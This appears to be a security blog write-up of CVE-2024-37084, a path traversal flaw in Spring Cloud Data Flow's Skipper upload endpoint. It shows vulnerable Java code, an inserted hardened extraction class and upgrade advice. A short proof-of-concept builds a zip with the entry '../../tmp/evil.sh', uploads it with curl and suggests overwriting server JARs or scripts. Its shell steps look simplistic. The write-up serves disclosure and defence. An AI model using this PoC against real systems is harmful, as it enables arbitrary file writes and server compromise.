> Summary:
> CVE-2024-37084 is a high-severity vulnerability discovered in Spring Cloud Data Flow, specifically in versions before 2.11.4. This bug allows an attacker with access to the Skipper server API to write arbitrary files anywhere on the server’s filesystem. This post breaks down how this issue works, what makes it dangerous, and how you can protect your systems.
What is Spring Cloud Data Flow and Skipper?
Spring Cloud Data Flow is a toolkit for building data integration and real-time data processing pipelines in Java microservice architectures. Skipper is an application package manager used by Data Flow for versioned deployment and management.
The API allows users to upload packages (called "releases"), but as we’ll see, it didn’t have the proper security checks in place.
Description:
CVE-2024-37084 is a path traversal flaw in how Skipper handled upload requests. By sending a specially crafted request, an attacker could store files *anywhere* on the server’s file system, not just in the intended directories.
References
- Original advisory at VMware Tanzu
- NVD CVE Entry
- Spring Cloud Data Flow GitHub
- Skipper GitHub
Technical Details – How the Exploit Works
The vulnerable endpoint was Skipper’s /api/package/upload. When you uploaded a new package, you sent a multipart/form-data POST request with a .zip or .tar file containing app artifacts.
Instead of validating the file names inside the uploaded archive, Skipper extracted everything as-is. This is dangerous when the archive contains entries with “dot-dot” paths such as ../../myfile.sh: the result is an arbitrary file written anywhere the web server process has write permissions.
The vulnerable logic looked roughly like this:

```java
// BAD! This doesn't sanitize entry names:
Enumeration<? extends ZipEntry> entries = zipFile.entries();
while (entries.hasMoreElements()) {
    ZipEntry entry = entries.nextElement();
    String fileName = entry.getName();
    // The entry name is joined to uploadDir without any check for ".." segments.
    File targetFile = new File(uploadDir, fileName);
    // If fileName is ../../../etc/passwd this will overwrite system files!
    writeStream(zipFile.getInputStream(entry), new FileOutputStream(targetFile));
}
```
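As an added example (not code from this post or from the Skipper project), here is the hardened counterpart of that loop in Java: every entry name is resolved against the upload directory and normalized, and any entry that would land outside that directory, or is absolute, is rejected before a single byte is written. The class name SafeUnzip and the /srv/skipper/uploads directory are assumptions.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;
import java.util.Enumeration;
import java.util.zip.ZipEntry;
import java.util.zip.ZipFile;

public final class SafeUnzip {
    /** Maps an archive entry name to a path under uploadDir, rejecting anything that escapes it. */
    static Path resolveEntry(Path uploadDir, String entryName) throws IOException {
        Path base = uploadDir.toAbsolutePath().normalize();
        Path target = base.resolve(entryName).normalize();
        // An absolute name makes resolve() drop base; a "../" name escapes base once normalized.
        if (Path.of(entryName).isAbsolute() || !target.startsWith(base) || target.equals(base)) {
            throw new IOException("entry rejected: " + entryName);
        }
        return target;
    }

    /** Hardened counterpart of the extraction loop: every entry goes through resolveEntry() first. */
    static void extract(Path zip, Path uploadDir) throws IOException {
        try (ZipFile zipFile = new ZipFile(zip.toFile())) {
            Enumeration<? extends ZipEntry> entries = zipFile.entries();
            while (entries.hasMoreElements()) {
                ZipEntry entry = entries.nextElement();
                Path target = resolveEntry(uploadDir, entry.getName());
                if (entry.isDirectory()) {
                    Files.createDirectories(target);
                    continue;
                }
                Files.createDirectories(target.getParent());
                try (InputStream in = zipFile.getInputStream(entry)) {
                    Files.copy(in, target, StandardCopyOption.REPLACE_EXISTING);
                }
            }
        }
    }

    public static void main(String[] args) throws IOException {
        Path dir = Path.of("/srv/skipper/uploads"); // hypothetical upload directory
        System.out.println("accepted: " + resolveEntry(dir, "apps/demo.jar"));
        try {
            resolveEntry(dir, "../../tmp/evil.sh"); // the entry name from the post's PoC
        } catch (IOException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The check must run on the normalized path, not on the raw string: filtering for a literal "../" prefix misses names such as apps/../../x, which normalize() collapses correctly.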
How to Exploit (PoC)
> Warning: This is for educational purposes. Do not use this against systems without permission.
Create the directory structure:

```bash
mkdir tmp
echo '#!/bin/bash\necho Hacked' > tmp/evil.sh
```
Now make a zip with a path traversal:

```bash
cd tmp
zip ../evil.zip ../../tmp/evil.sh
```

This creates evil.zip with the entry ../../tmp/evil.sh.
Craft the API Upload Request
You need a POST request to /api/package/upload with the zip file.
Here's a curl snippet:

```bash
curl -X POST "http://target:7577/api/package/upload" \
  -F "file=@evil.zip"
```
Result:
Upon extraction, Skipper writes evil.sh into /tmp/evil.sh. With more knowledge, you could overwrite application JARs or even replace scripts the server will execute.
Mitigation: Upgrade to Spring Cloud Data Flow 2.11.4 or later.
Conclusion
CVE-2024-37084 is a classic example of a dangerous path traversal caused by insufficient file-name validation in an upload handler. A single crafted zip archive could result in full server compromise. If you use Spring Cloud Data Flow or Skipper, update immediately, check for signs of compromise, and restrict API access.
For more details, consult the official advisory.
Timeline
Published on: 07/25/2024 10:15:07 UTC
Last modified on: 08/01/2024 13:53:22 UTC